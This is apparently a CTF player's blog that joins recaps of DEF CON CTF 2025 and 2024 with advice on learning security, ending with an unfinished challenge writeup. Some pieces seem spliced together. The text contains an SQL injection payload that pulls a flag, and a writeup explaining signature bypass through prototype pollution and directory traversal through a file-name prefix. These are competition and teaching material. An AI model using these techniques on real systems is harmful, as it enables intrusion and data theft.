When we won last year, our hat-trick, we were the first in DEF CON’S history to do it. 3 consecutive victories, 8x3 (24) black badges awarded in 3 total years. I think it was safe to say that a reputation formed around us and naturally, speculation. PPP and The Duck already had their own reputations so it’s not like the secrets and rumors and awe towards MMM came out of nowhere. However, it’s not like MMM was the only team that did well enough to have a reputation in the CTF community.

Any team that has managed to qualify for DEF CON is a strong and worthy team. Each one with decorated legacies and reputations, formed from other victories and vulnerabilities found. Every team had their powerhouses, and none of them were discounted. We didn’t have a notion of a “weak” team, here in MMM. And as such, we treated each and every one of our competitors with their respect that is due. This also meant that the concept of “going easy” is not in our lexicon, and never will be. Each team we encountered in DEF CON was a worthy and powerful rival. So we didn’t hold back. My opinion piece on DEF CON came a little late, probably later than it could have to influence some people’s opinions on this matter. But, I think after about 5 years of CTF, and idk how many more to count, I’ll admit I gave up on the idea of ensuring that I’ve impressed every single CTFer I’ve met in my life. I worked hard. I played hard. Discount that how you will.

PREGAME

I arrived on the Wednesday, August 6th, to try and at least enjoy Vegas a little bit since the consecutive 5 days after will give me no relief or reprieve. So, I don’t really have a lot of technical stuff to discuss here, so I’ll indulge and spend some time talking about the things I did.

First, I met up with a teammate and we spent the whole day together, getting oriented around Vegas after an early room check-in. I got tacos and tequila at Chayo’s near the Vegas strip, then picked up some other teammates who also came early and hung out with them for the rest of the night. It was really sad - Chayo’s has a mechanical bull in the back that I really wanted to go on but it was closed down that day :(

Thursday was when most others were in Vegas, and I decided to get some breakfast with teammate at the Paris hotel at Mon Ami. The rest of Thursday was prep. We set up our tooling, debriefed on what each and every team member’s roles and responsibilities would be, and coordinated other logistics.

This was our 4th year coming to DEFCON, and we held no reservations. Our last win last year was hard-fought and we expected a harder fight with more aggressive teams. The Thursday debrief set the scene to ensure that regardless of what the outcome was, we would give it our all.

Day One - Friday

DEF CON’s usual light banner, this time in a giant E.

OH 3 FOR 33

Friday I was at the floor, and had a fun time trying to figure out networking logistics. At the beginning of the game there seemed to be some ethernet cable issue with our setup that thankfully, a bunch of the organizers came to try and help with. I think we lost precious minutes at the start of the game but the rest of the days forward made up for that.

Nautilus Institute’s last organized DEF CON introduced a (new to me, old to others in MMM) mechanic called “stealth ports”. Each challenge, on each player’s box, had 2 ports running the same service. Port A’s traffic was recorded and provided to us in pcaps. Port B’s wasn’t. The flags sourced from port A were of a very high point weight than that of port B. You therefore had an interesting metagame with stealth ports: you could hide a potentially valuable exploit by hitting teams through stealth ports but lose a SIGNIFICANT amount of points (75% decrease), or you could expose your exploit and allow others to potentially copy it from the exploit, but gain full points that way. This introduced a very welcome layer of strategy onto us that we tried to use throughout the game.

Aside from disappearing wifi and new meta discussions of stealth ports, I also had the opportunity to enjoy some challenges - one of which was the first King of the Hill: Attestedfun.

KOTH: attestedfun

The first KOTH challenge, attestedfun, was very interesting. I don’t think I’ve ever had a challenge that involved a phsyical phone for interactions with, so Nautilus Institute takes the cake for this one.

The premise was simple, after reverse-engineering a server you’re given (on the floor) a physical android phone with nothing on it (factory reset). You use it to interact with an app that’s just a text box on a green screen. Typing anything in it forced you to watch (at 90 volume cause yall are SICK) either steamboat willie or rave gandalf in its entirety. When the troll was over, the app spat back a seemingly base64-encoded string to you.

After I recieved the phone on the floor, I set it up and downloaded the companion APK. In case there was anything special needed for the phone, I got a few measures to add frida into the app for dynamic instrumentation, and at one point we rooted the phone, but reversed it when we realized we didn’t need to.

The actual meat of the challenge was in the rust server. It was a gigantic binary that we manually reversed, and some portions of it are still confusing to decipher. Anyway, in the first iteration of this challenge, there were the following problems:

b1
biosig1
biochain1
biochain2
biochain3
biocert1
biocert2
biocert3
biochall1
biobstate1
pcsig1
pcsig2
pcchain1
pcchain2
pcchain3
pccert1
pccert2
pccert3
pcchall1
pcbstate1
di0
di1
di2
di3
di4

The rough idea of attestedfun was to reverse the logic behind each challenge and perform the requisite actions to satisfy them, on the phone. I could go into greater detail into a seperate blog post about this, as attributes of it were really cool. What wasn’t cool was having to, intermittently every 5ish mins, hear steamboat goddamn shit-ass willie in its entirety for the rest of the game. I stand before Christ with how close I was (very close) to losing my shit (very very close).

End Day One

Conclusion of day 1 ended with us on top, with a steady lead. However, we’ve been through this 3 times already. We knew that first looks are decieving. In spite of our lead we didn’t slow down - the next night would be sleepless for most of us.

Day Two - Saturday

Saturday was business as usual! We woke up, most of us, and span our exploits found overnight ready into our thrower. While we started with a lead, we also knew how easy it would have been to end without one. Saturday was also the day I focused on and looked at 2 additional challenges: hs and axis.

KOTH: hs

I was not a fan of this KoTH, my main feedback being that it doesn’t “look” like a KoTH.

My understanding of a King of The Hill challenge was that of one with a moving goalpost in relation to other teams. You are therefore forced to perform iterative optimizations reactionary to what other optimizations other teams are doing, to maintain a top position. This is why KoTH challs have their own scoreboard to measure these nuances in said optimizations.

The first problem I had with this KoTH was the lack of a scoreboard. It is unclear to me if there was supposed to be one in the first place, or if it was added on later, but regardless the initial few hours that hs was live it was totally unknown to teams how we were doing in relation to each other. This felt like an important aspect of any KoTH that wasn’t reflected here.

HOWEVER, one could make the argument that a scoreboard wasn’t necessarily needed as once you solved a prompt/got a flag, you were done for the rest of the challenge, which brings me to my 2nd problem: there was no “optimization” to be had.

A KoTH should be able to provide some active, engaging set of “tasks” to do per tick. Once you found the flags in hs, you didn’t have to do anything else. You could passively gain points after figuring out 1 needed prompt for 1 needed flag. This removes some of the properties of what makes a KoTH so great. Hs felt more like a jeopardy challenge shoehorned into DEF CON, over a challenge specifically tailored to accomodate consistent tinkering upon optimizations for the problem. I think this would have landed better as a jeopardy challenge during quals, or maybe an attack-defense challenge with tweaks, but it just didn’t make sense as a KoTH challenge. We dedicated minimal resources to this as the ROI on this challenge was tiny, and dwindling faster than other challenges. Our priority landed on those other challenges.

AD: axis

Axis was a web challenge written in erlang, but provisioned as an erlang binary so we needed to reverse it. The reversing was probably the most interesting part, as the web component here was more straightforward. The code of Axis was recycled from previous challenges: rawwater from the 2023 quals and gilroy from the 2024 quals. Snippets of the reversed binary revealed dead source code that served as a sort of template from both challenges that came before. Some of these dead code bits created rabbit holes, but we did have a jumping off point to base some of our exploits on. Most of said exploits were SQLi, as the challenge allowed you to modify fields in other tables of the SQL database: vie', name = (select flag from flags) || '. Creating forms also allowed you to view these table fields for flag viewing purposes.

End Day Two

We got kicked out of LiveCTF pretty early so our point delta would look different without the boost of points. This year’s stealth ports meant that every other point-gaining attribute got a massive scale up, so losing out of LiveCTF top 3 meant that our lead wasn’t as big as we thought it was. This was concerning - the delta between first and second place was smaller than we thought. Furthermore, the last day of Sunday was, idk, 3 hours long? We couldn’t spend those remaining hours doing fuck-all. Last night, and last few years, we encouraged and had a system of people who slept while others worked, on shift. This day, we all collectively said fuck it. All of us were up.

Day Three - Sunday

I don’t have much to say here since the day lasted 3 hours - basically. I guess I have more to say on the afterparty, but that comes later.

We concluded Sunday throwing everything we got. Fuck stealth ports - just throw whatever we had. For the last bit of the game lasting 3 hours, it admittedly was pretty intense. Bpak got the call for our victory and we were requested for our 8 black badge recipients. On MB’s side, we chose some people who showed an intense dedication during the game itself, and to the CTF team as a whole.

The black badges this year were cool - the lanyard was an intricate hand-beaded design with a brass cast of this year’s design.

Afterparty

Unlike previous years, this year’s afterparty took place in a (?) compound (??) of multiple houses with a general backyard area (???) centering them. The afterparty was, as usual, very fun. I spent most of my time with my teammates but it was genuinely lovely to see all of my other CTF friends there too. The party is the ONE time I get to have to see alot of said friends around, as I’m not really venturing around meeting other CTF players during active competition times. A lovely shoutout to some cool people I met from mhackeroni, KuK Hofhackerei, and of course Dicegang (SuperDiceCode) and Shellphish.

Bluepichu and Vie say yeehaw

To Nautilus Institute

4 years. I understand that for some of you, this was not your first rodeo.

Your breakthrough year of 2022 was controversial, to say the least. Many CTF teams have various thoughts about how DEF CON was organized during your reign. I won’t discount the valid cirticism that they may hold, BUT I will ignore the less-valid criticism that were thinly-veiled insults, that shit isn’t productive. In fact, I’m sure you’ve heard it all already. Many teams, especially the ones who played in the CTF this year, have also organized their own CTFs, so some points of feedback are coming from wiser places than others.

But every CTF is different. And I also know (in fact, perhaps am very aware) that you recieved 10 complaints to every 1 compliment directed at you. You’ve shouldered the task of a fucking thankless job for 4 years. Everyone wants DEF CON CTF, and nobody wants to organize it. It’s as if we all implicitly know that if we’d take up the mantle we’d open ourselves to more hate than love, because teams clamor up and desperately fight with their fangs out during quals for a chance to hit Vegas. We all think we’d do a better job, but there will always be something to hate. You have run the CTF, the CTF that has the allure of a siren to the community. Everyone has opinions on it.

I’ve been on the other side as well. Organizing a big, high-stakes CTF means you’re given an ocean of responsibility that’s easy to drown in. I won’t absolve you of mistakes you may have made, but I know I don’t have even the smallest shred of understanding of the ocean you were in anyway - and I help with GoogleCTF, a similarly gigantic high-stakes CTF.

To Nautilus Institute, I see you. I see the work you’ve put in, and know that the only thing that was propelling DEF CON CTF forward was the absolute dedication to the craft that could have only come from a principled love for the hacking community. It takes some real guts to stand tall in spite of getting shit on for a CTF you feel like you’ve dedicated actual years of your life to, even if the criticism was valid (yes, I have valid feedback, and I hope I have communicated that effectively earlier). I know what its like to sacrifice your nights to keep a server running and then ignore the hateful messages in the same hour, I commend you for the ironclad guard you would have needed to withstand that. That kind of determination and drive to push yourself (even when you might kill yourself doing so) comes very rarely, and is worth its weight in gold. I’ve been in your shoes. I see you.

Goodbye, thank you for the blood and sweat and tears that created 4 years worth of hacking, and goodluck to the next organizer.

Closing Photos

Jason (Kirkland Green Tea) packed a shark costume and wore it for our team photo.

Vie Boat Willie

We got Maple Bacon custom shirts :)

2 such members went on to co-create Theori.io, a leading platform of security solutions covering everything from security education to audits and consulting. Their presence exists in both South Korea and USA, and they have their own CTF team, The Duck, that dominates leaderboards whenever they play.

Up north, professor Robert Xiao, after completing his PhD at CMU, went on to become an assistant professor at the University of British Columbia in Vancouver, Canada. A seasoned CTF player, he brought more visibility into the world of CTFs to UBC, founding and creating the team Maple Bacon.

Without alot of the support I got at Maple Bacon and MMM, I don’t think I would be where I’m at today. That’s a fact I think about often and keep close to me. It has now been almost 2 years since I graduated UBC, and about 4ish years since I got into CTFs as a whole. If you know me, than you would know I was once an artist in a past life. I think it’s natural for me to compare my artistic journey to my hacker one and see the differences and similarities between the two, which I have talked about before. But one difference was that as an artist I was alone.

It kinda helped, I think, the isolation. With no one else to bother you, you only focus on what is in front of you: the canvas. I also know that you can only go so far on your own, at least in my case. I approached CTFs the same way I did with art, and it definitely led to some early successes - alot of the skills are transferrable (not, like, the painting skills. Obviously. I mean the more abstract “thinking out of the box” skills. Fuck it, you get what I mean). I think what got me farther was the fact that I wasn’t alone. When you have a group of hard working people around you, you’re naturally ingratiated to be just as hard-working yourself. Maybe that mentality helped tremendously with our 3rd consecutive DEF CON win this year.

I’m really late with this, I’m aware. I’ve sort of combined this with a psuedo-retrospective end of year recap just so I don’t have to release multiple different blog posts at once all covering similar principles. I’ll try and format this blog post based on a selection of questions I’m frequently asked.

How do you pronounce Vie?

Vie

You’re a web main - how do you feel about the lack of web representation in DEF CON?

I can do more than web stuff

DEF CON was in August. You’re a little late!

Hey thanks for noticing. 2024 kind of kicked my ass. I don’t feel like trauma dumping on main here so I’ll leave the details out and say that 2024 was a year I survived, instead of thrived. But that’s alright, imo. Sometimes you forget who the fuck you are and you need some time and self-care to remember who the fuck you are. Sorry I’m late.

Tell me more about DEF CON.

Thursday

DEF CON being at the LVCC was annoying in terms of needing to carpool to get to the convention, as opposed to walking there from our hotels, but this is ultimately a first-world complaint and something I forgot about during the entire CTF.

I love Vegas. It’s a pretty city. I spent the first day hanging out with MMM, getting shit set up, and getting my badge from the convention center. I went to Nobu for a fancy dinner and damn, I gotta say, the miso black cod is worth the hype.

Friday

Before getting super involved in DEF CON, I was also present in Vegas for a special talk at Google’s init.g event. I did a talk covering some red teaming concepts with Zeta, which went pretty well! Here’s a video where LiveOverflow shared some Android hacking tips, as part of init.g.

I really liked the badges that they did for this year. You can turn the cat shape upside down to have an ergonomic gaming controller and play the game in the badge challenge.

The black badge variant was also very cool: laced with gold and swarovski crystals, and I think radioactive isotope? Someone fact check me on that I can’t remember.

In a massively good move, patches submitted to the CTF infrastructure would be rejected before being uploaded to the public docker registry if the patch failed the SLA CI/CD tests. This was huge, removing the SLA component in the general scoring formula (making it rely solely on attack, defense, liveCTF and KoTH) and having it be tests that our patch would have to pass removed alot of potential headache of downed services or other SLA-failing issues we dealt with in the past. Naturally we wouldn’t know what the tests were actually doing cause then patch-making would be easy, but this simple switch saved us some headaches we were accustomed to getting in previous years.

In an attack defense CTF, whoever first bloods gets a massive advantage, and that was not us. Several teams managed to pop off exploits before us and that meant a whirlwind Friday as our first day. There were 8 A/D challenges:

• bizbee
• lazelle
• codewords
• backflip
• cloud-cache –> I looked at this one the most
• helium
• bisbeebee
• sokoban, released on day 1 and retired day 3.

We also had a KoTH challenge with LLMs: llmship, which had since been a thing from 2022, and I assume is just going to be a mainstay from here on out. This challenge seemed to be a callback to ropship AI, but with actual AI (LLMs). Unfortunately, LLM challenges involve randomness that sort of prioritizes prompts on a metric completely unknown and random to us, and it felt like we were very unlucky with this challenge.

Friday left us a bit wrought out, but we maintained our determination into the next day.

Saturday

I was really busy and wasn’t able to hang out with some coworkers, but this day I went down to the floor and got some photos taken of the new venue. LVCC is awfully nice and I do appreciate how spacious the place was.

Here’s the situation: for a while, we (MMM) were at 5th place for a good chunk of the day. In spite of our numbers alot of us were running around patching, identifying vulns, and otherwise getting confused why patches were getting rejected. DEF CON always brings the best so we were expecting a fight, and dare I say, we were getting burned out.

I don’t have much else to say for this day, just that we were still working hard but getting frustrated at the little fires we had to put out. We ended Saturday in 2nd place, but we all knew we wanted only one position.

Sunday

In a phenomena I can only describe as a Collective Dislike Of The Circumstances We Were In, each and every single one of us at MMM all unanimously agreed to stand on business. I do find it sort of poetic that we all simultaneously said “fuck burnout, we’re not burning out” and made a synergetic system of identifying vulnerabilities in the challenges, then multi-threaded patch and exploit creation at DEF CON.

For me, I was with the group in defense, pushing out and reviewing patches, which went pretty well imo.

KoTH was still our weakpoint, we were wrangling with the previous LLM challenge’s apparent randomness and at a certain point we collected our L for that. We better diverted our attention towards gaps in our system of exploit development, patch development, and so on.

Clutching first place on Sunday was a great feeling. We got our hat trick and I’m more than happy to celebrate that. Here are some random funny snippets of the end that I really like:

How does one get better at CTFs to play in DEF CON?

I’ve seen an uptick in people asking me what curated list of tips are relevant to get oneself to DEF CON. It’s a reasonable ask and it’s one that I don’t have a reasonable answer for. I tried to coalesce some of my thoughts and tips on it into a tweet thread a while ago but after some consolidation of resources, I have a slightly (?) better (??) answer for it.

Fellow CTF player and my good friend, ZetaTwo, said it best: you should learn enough about the other categories of CTFs outside of your main to get to a good enough level to solve those categories at a medium level, whilst you focus on building out the skills needed for your main category.

It can take some time to learn, depending on the person. If you’re someone who doesn’t like low-level stuff than binary exploits and reverse engineering require concepts of computer memory and operating systems that will feel alien to you. (Hey good thing there’s, like, a free set of educational materials for that). Or if you’re not one for number theory than you’re not gonna like the RSA problems in cryptography (Hey good thing there’s a free set of educational resources so on and so forth). Or if you don’t like JavaScript, PHP, server-client paradigms, obscure client-side quirks about the browser, you’re not gonna like web (HEY GOOD THING THERE’S-). My point being, ZetaTwo’s advice is solid advice and the one that I try to follow when I learn new things. It’s just not a particularly trivial bit of advice to follow.

(But what good would the advice be if it was easy? Was winning DEF CON easy? No, it wasn’t. Nothing worth doing in life comes easy. I didn’t bust my ass for near 20 years of my life learning how to best shade in an apple with oil paints to come out of it saying it was easy. I still have callouses around the pads of my palms that gripped the brush, they’re never going away. Who says that learning something you love doing would be easy? It’s easy when you look back and do the easy challenges, ones that you struggled on previously, or paint the simple things. But I don’t wanna paint fuckin apples all day. I don’t wanna solve easy XSS element.innerHTML = "your exact URL query" all day. I want a challenge because that’s where the fun is. Have you ever turned on god mode when you play Skyrim? If you played Skyrim throughout its entirety while on god mode, that shit would get boring really really quick. There’s no skill progression, no failing and trying again, no adjusting of strategy, you just one-shot everyone while you T-pose your way to Alduin face-down holding a pot like OKAAAyYY dragonborn that’s not fun. Turn off the goddamn god mode. You learn and derive fun from the challenge of it all. Why does everyone like Soulsborne games? EXACTLY. When it’s easy for too long it’s boring. Elden Ring was so good.

Oh my god. What was I talking about earlier? CTFs right)

In my opinion, Z2’s advice is two-pronged: get used to the concept of “challenging”, and also round out your skills to build yourself up. The thing is, if you come across adversary while you learn a new skill, or if you come across challenge you feel like you can’t overcome, that’s a Really Good Thing actually. I’d make the extremely anecdotal source-I-made-it-the-fuck-up argument here that you need both a consistent reward base (so solving and getting the flag in CTF challenges) and a portion of negative stimuli and failure (not solve a CTF challenge and learn why) to improve your skills. After all, how do you know where to break your ceiling if you don’t know where your ceiling is?

Azeria of AzeriaLabs has this blog post that I like to look to when I want to Learn A New Thing: The Process of Mastering a Skill. She goes into good, researched detail about the science behind learning a new skill (go and read the whole article. It’s really good):

Today we know that it’s not magic. It’s this specific form of practice. If you look at the so-called “geniuses” throughout history, time and again the common factor is not innate talent, but just that they each put countless hours into mastering their craft long before arriving at their respective breakthroughs.

As an aside, people often praise my artistic capabilities as talent. Like, okay? We can make the argument that I expressed a desire to draw and doodle at a very young age - that could be defined as talent. But talent doesn’t explain the progression of the toddler’s doodle to now. So over the course of 2 decades (I can’t stress this enough I spent 20 years of my life learning this craft, 20 YEARS like you’d think I would be drawing Baroque realism all over the place but no instead I fight computers for a living) I went to art classes, got tutoring, did lessons, and practiced art on my off time outside of my schoolwork. Talent got me my first step and consistent habit got me the rest of the fuckin way there.

So, am I going to spend the next couple of mins of this post evangelizing grind culture and HaRD WOrk? No, not really, either. But I am going to state a pattern I’m observing:

Here is a post that I made at the beginning of my CTF journey. It’s, TL;DR, an XSS problem which uses quirks in the qs parsing library to bypass XSS sanitization. I think I spent the first 24 hours of GoogleCTF on it? I didn’t solve the other one, cause it was beyond my capability.

Here’s a GoogleCTF problem I made 3 years later about employing type-confusions to chain a series of class functions together to bypass XSS sanitization alongside a CSRF bypass with different HTTP methods. Notice how the challenge from 2020 involves the same general point of XSS sanitization - except now I actually knew what I was talking about in the year I made my challenge. Pasteurize, the challenge from 2020, taught me very important concepts of XSS sanitization, type confusions, and parsing differentials, ALL 3 things that were very useful during my development of Veggie Soda. I couldn’t have done Veggie Soda without struggling through Pasteurize.

From the years 2020 - 2023 I wasn’t doing fuck-all, I was learning. I learned alot of parsing differentials and XSS sanitization that day in GoogleCTF 2020. But at that point, Pasteurize was the hardest challenge I knew at the time. In the 3 years of progression I learned about different things through different challenges that confronted me at the goalpost I was and only allowed me a solve if I ventured out towards the next goalpost.

So if I hyperfocus on it, I can get to DEF CON too?

Hm.

Here’s another anecdote: At UBC, the computer science major has gotten so popular as of late that entry to the major is competitive. At UBC, you apply to join a faculty (Arts or Science, if you want CS). After your first year, you declare a major. For most majors, it’s simple enough to declare it and get on with picking your requisite classes - but for certain majors, you need to apply and see if you’ll get accepted against the general average. This general average is the average of the other students applying for the major - if you’re above that average you’re likely to get in. If you’re below, well.

Over the years this competitive average has gotten higher and higher. And the concentration of students interested in computer science is higher than it was when I started. I see why a competitive average was needed. Alot of good schools in Canada employ similar strategies to optimize for the student that they feel can succeed in their computer science programs. I can imagine that, while not exactly the same, the barrier of entry to computer science is similarly hard for universities across the world. It makes sense.

I also see it yield a very particular environment for a particular type of Extremely Anxious, Hyperfocused Student. If you want a good chance at getting into the CS major, you need good grades, obviously. If you want to really optimize your chances than you’re probably going to look for the courses that are “easy” to take but still relevant to what you’re going to study for in CS. This means enrolling in the courses that are the least amount of work needed to get the highest grade possible - for example, you tend to see many CS students at UBC take Philosophy 220, because it covers much of the same ground as Computer Science 121. Both courses cover logic, just under different pretenses. A CPSC 121 student won’t really be covering new ground in PHIL 220 and vice-versa.

In your first year, if you want to get into CPSC, you need to get the high grades. It’s ““““““easy”””””” to get high grades if you take “““““““““easy”””””””” and relevant courses. And the cycle sorta continues. If you want to participate in the Science or Arts CS co-op program, you need a specific average. So you will continue minmaxxing for high grades on ““““““““““““easy”””””””””””” and relevant courses. This means that you get really good at taking tests and studying for specific concepts in material. It’s good to get the full picture but it’s efficient to read out the paragraphs that explain the specific problem you’re trying to solve.

At a certain point, the material for upper-level courses shifts. The general expectation of the CS student at this point is to instead focus on a skillset that they feel most useful to them. In your 4th year, you’re not going to have the time nor energy to be able to try all the relevant courses anymore, and also, fucking most of them are NOT ““““““““““““““““““““““““easy””””””””””””””””””””””””. Maybe some of them are but that is a more subjective take over anything else.

Alot of CPSC students will happily reccommend their favourite upper-level courses and often use words to describe the course’s merits on how interesting it is, how dynamic it is, how relevant it is to the world, how much they like the professor, or how unique and cool the material is. You will still see some comments on the general difficulty of the course but that goes into lesser relevance over raving about how cool they thought the course material was.

You’re still going to have to take tests in your upper-level courses duh, but this time, UBC is hoping you’ve chosen the upper-level courses that you don’t mind going the extra mile for. The courses that, you know, you would read more into the textbook for. I don’t think that’s a hard ask of a 4th year student to choose the courses that they actually want to delve into the material for. UBC is hoping that, alongside all of those skills you developed minmaxing for high grades on “““““““““““““““““““““““““““““““““easy””””””””””””””””””””””””””””””””” courses, you also developed skills of curiosity and a healthy respect for the desire to develop a robust skillset. Let me be clear: that is a mindset you should have been developing on your own, outside of class. This is relevant because the real world cares less and less about your GPA minmaxxing ratio. It cares if you have the ability to solve problems you’ve never seen before, with skills you built from twisting material you learn into new scenarios for your own curiosity. The real world is not a standardized test.

So if you “study” for DEF CON like a standardized test, I think you’ll get much of the base points in theory. But in practice, DEF CON isn’t a standardized test. And neither was Hackceler8. And neither was my interview process. And neither is my job. The generalized skill of learning how to take a test is a different thing over learning how to build your skills that allow you to succeed in intense events (as a side note can you imagine if there was standardized test taking as a weird olympic sport? Oh my GOD all my “gifted as a child” peers RISE UP).

You need to build skills that reward curiosity and are rewarded by active and consistent question-asking, ambition, and a genuine pursuit for knowledge. You need to build skills that have you look at the unknown with excitement and apprehension - not giving up at first sight of adversary. My colleagues say it best: if hacking was easy, everyone would do it.

Anyway. In relation to qualifying for big events like Hackceler8, DEF CON, SECCON, the proof is in the pudding - you put consistent effort in the things that you are genuinely curious about. You have to broaden your horizons by getting dirty into the material you want to earnestly learn. You dont just get there by solving a CTF challenge and checking the box, you get there by deeply investing in the topics that the CTF challenge demands you to understand. If you have solved an XSS sanitization bypass, I expect you to be able to tell me more about the web API standards, DOMpurify, and XSS DOM sinks and sources, or even beyond: service workers, event handlers, server-side XSS - if you actually marinated with the challenge. And if you’re not genuinely curious about it, it will be hard to scratch up the will and determination to keep learning.

You don’t just learn reverse engineering, you’re also learning things like rapidly prototyping environments to replicate the vulnerability you want to exploit. You don’t just learn web exploits, you’re also learning how different web APIs in the window interact with and potentially fuck up security boundaries. My advice, summed up, is to stand on business. You’re not just learning about how to solve a CTF challenge, you’re learning about all the concepts that lead up to it. Be curious. Explore and answer the questions that pop up in your head, on your own. Don’t be afraid to be wrong. Don’t be afraid to tackle a challenge you don’t know anything about. Just understand that investing in your curiosity and delving deeper into your own interests is, like any investment, one that takes time. Spend less time trying to learn things passively, or going over material you have mastered already. We’re not trying to solve the same kind of problem here, nor are we studying for a test - you don’t need to memorize definitions exactly to get points. Start getting into this habit: Try a CTF challenge, and don’t even consider looking at a writeup until you have deconstructed every piece of code in the challenge. Ask ALL of the questions: “what is this API? What does this keyword mean? What is this? What is that? What happens if I do this?” - if your brain asks the question, your brain commits the answer to memory alot easier. As someone who spent 2 decades (20 FUCKING YEARS OF MY LIFE), I should know. Good things take time, and time rewards curiosity. Time is also consistent, so you should be too.

Cool, anything else?

Uhh. I did Hackceler8 2024 commentary and game design again. That was really fun. Here’s a few photos from Spain (where Hackceler8 took place this year):

I really do like documenting the things I did in the wake of a shit year because it does remind me that 2024 was still a good year of growth. Here are some of my favorite things from 2024:

• MMM hat trick at DEF CON, winning the last 3 consecutively
• Making and expanding upon Hackceler8 2024, which is a feat I can’t claim full credit for, I am very thankful to be working with a talented group of literally the best security people I have ever met
• Kendrick won his Drake v. Kendrick beef
• I did a talk at Area41 talking about how an artist became a hacker which covers alot of the points I talked about here already

New Year’s Resolutions

ᶦᵈᵏ ᵈᵘᵈᵉ ᶦ ᵏᶦⁿᵈᵃ ʲᵘˢᵗ ʷᵃⁿᵗ ᵃ ᵇʳᵉᵃᵏ

I’d like to be more proactive about some of the projects that I wasn’t able to keep track of this year. I set the pathway stones down for some things I wanted to do for a really long time, so I’m treating 2024 as a filler arc and hoping 2025 I actually do remember who the fuck I am and get to achieving some milestones.

I said earlier that I spent most of my time becoming an artist completely on my own. I don’t think I’d go back to dedicating more years to it, but I do think I would be happy to spend a little more time in the CTF community, probably because I have great people around me.

Maybe that’s my advice. Just, like, find a really cool team of really cool people who are not just your CTF teammates but are also your friends. I think that helps a lot.

Anyway, goodbye 2024.

SPECS

start.sh

The start.sh script is more sus than other conventional start.sh scripts as it will attempt to restart the server 5 times, then copy a backup to the app folder if it couldn’t restart, and retry again in a perpetual loop.

#!/bin/bash

cd /app;
# Loop in case the app crashes for some reason ¯\_(ツ)_/¯
while :; do
    for i in $(seq 1 5); do
        bun run start;
        sleep 1;
    done
    # Okay for some reason something really goofed up...
    # Restoring from backup
    cp -r /home/bun/backup/app/* /app;
done

It’s technically not wrong to have a start.sh auto-restart a server if it goes down, but there’s a few ways to do that that’s considered “cleaner”. On the infrastructural side, enabling restart: always in the docker-compose.yml file does the same thing, with the added benefit of restarting the whole container, on a clean serving of the app data (no need to copy a backup). Basically, having the app do the restarts in the challenge itself seems weird. This is important for later.

index.ts

Some ground truths about the challenge:

• It runs on TypeScript, and the runtime is Bun
• It’s a prisoner?? database with an “examples” endpoint that gives you a JSON of all of Oceania’s prisoners and their crimes. Each prisoner JSON has properties that are prefixed with signed., and these signed properties are used for signature generation.
• The app can accept submitted JSON, validate its signature, then use stringify from a yaml module to convert into yaml. The JSON-to-YAML is yeeted into a new file, and the app checks for the existence of an outputPrefix in the JSON data. If it exists, it’s put into the filename as outputPrefix-<random sequence of chars>.yaml and saved into a folder called /app-data/. That file will not be used anywhere else in the app after it’s created.

Exploits

Bypassing Signature Validation with Top-level Prototype Pollution

In /src/index.ts:

const SIGNED_PREFIX = `signed.`;

const getSignature = (data: any): string => {
  const toSignArray = Object.entries(data).map(([k, v]) => `${k}=${v}`);
  toSignArray.sort();
  const s = createHmac('sha256', SECRET_KEY)
  .update(toSignArray.join("&"))
  .digest("hex");
  return s;
};

const hasValidSignature = (data: any, signature: string): boolean => {
  const signedInput = getSignature(data);
  return signedInput === signature
};

const getSignedData = (data: any): any => {
  const signedParams: any = {};
  for (const param in data) {
    if (param.startsWith(SIGNED_PREFIX)) {
      const keyName = param.slice(SIGNED_PREFIX.length);
      signedParams[keyName] = data[param];
    }
  }
  return signedParams;
};

The above functions are responsible for the signature checking. The signature is used to stop us from creating our own JSON objects. The signature is computed with a secure I’m-not-gonna-try-to-bruteforce method and is based on all properties in the JSON whose key value starts with signed.. If we modify the signed properties in any way, the signatures won’t match and the app will reject our JSON. However, the functions don’t check // don’t care for properties in the JSON whose key value don’t start with signed., so we can freely add arbitrary properties as long as their key doesn’t start with signed., and those additional properties won’t affect the signature. We still wouldn’t be able to make a JSON from scratch due to the I’m-not-gonna-try-to-bruteforce method to make a new signature, but we can copy one from the “examples” endpoint and reuse its signature.

An example JSON file looks like this:

{
    "signed.name": "jeff",
    "signed.animalType": "emu",
    "signed.age": 12,
    "signed.crime": "assault",
    "signed.description": "clotheslined someone with their neck",
    "signed.start": "2024-03-02T10:45:01Z",
    "signed.release": "2054-03-02T10:45:01Z"
}

The function getSignedData will be given JSON like this and look for any keys using Object.entries that start with signed., and assign it to an empty object. That object, after having been given all the signed. properties, is then returned.

The assigning is vulnerable to top-level prototype pollution:

    if (param.startsWith(SIGNED_PREFIX)) {
      const keyName = param.slice(SIGNED_PREFIX.length);
      signedParams[keyName] = data[param];
    }

signedParams[keyName] = data[param]; allows you to assign arbitrary properties but only one-layer down. This is not a recursive assignment, so you can’t give whole objects to the data. So we can define a signed.__proto__ as a key and add additional properties in there - and because Object.entries() doesn’t go up the prototype chain during the signature check - but the for (const param in data) loop to assign props DOES go up the prototype chain, it will be added to the object but it won’t violate the signature check. This function is used later on in this snippet of code:

      const body = response.req.valid('json');
      const data = body.data;
      const signedData = getSignedData(data)
      const signature = body.signature;
      if (!hasValidSignature(signedData, signature)) {
        return response.json({ msg: "signatures do no match!" }, 400);
      }
      const outputPrefix = z.string().parse(signedData.outputPrefix ?? "prisoner");
      const outputFile = `${outputPrefix}-${randomBytes(8).toString("hex")}.yaml`;
      if (convertJsonToYaml(data, outputFile)) {
        return response.json({ msg: outputFile });
      } else {
        return response.json({ msg: "failed to convert JSON" }, 500);
      }

As in, the data is stored in the variable signedData. Because the pollution is shallow, we will need to look for properties that the code is checking in the object itself for, AKA, is signedData expected to have any other properties that were not previously defined? The answer is yes: const outputPrefix = z.string().parse(signedData.outputPrefix ?? "prisoner"). outputPrefix will be “prisoner” if it wasn’t defined, otherwise we have full control over that value if we do define it. This is useful for us because outputPrefix is next used to create the filename in outputFile, which is created as a template string with outputPrefix prepended to the rest of the filename. We have, ostensibly, semi-control over the filename. We can certainly LFI and traverse the directories by making outputPrefix a bunch of ../ characters, but before we get into how we’re gonna use it, we gotta review the other bugs first.

Nullbytes

The function convertJsonToYaml is defined here. Remember that the app doesn’t actually use the yaml file anywhere, it’s just stored somewhere.

const convertJsonToYaml = (data: any, outputFileString: string): boolean => {
  if (checkIfContainsBannedString(outputFileString)) {
    return false
  }
  const filePath = `${OUTPUT_YAML_FOLDER}/${outputFileString}`;
  const outputFile = Bun.file(filePath);
  // Prevent accidental overwriting of app files
  if (existsSync(outputFile)) {
    return false
  }

  try {
    const yamlData = stringify(data);
